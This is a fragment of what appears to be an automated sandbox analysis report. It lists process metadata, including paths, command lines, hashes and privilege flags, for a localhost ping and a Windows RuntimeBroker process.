                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:31
                      Start time:15:49:35
                      Start date:28/04/2022
                      Path:C:\Windows\System32\PING.EXE
                      Wow64 process (32bit):false
                      Commandline:ping localhost -n 5
                      Imagebase:0x7ff66d420000
                      File size:21504 bytes
                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:32
                      Start time:15:50:08
                      Start date:28/04/2022
                      Path:C:\Windows\System32\RuntimeBroker.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                      Imagebase:0x7ff61beb0000
                      File size:99272 bytes
                      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      No disassembly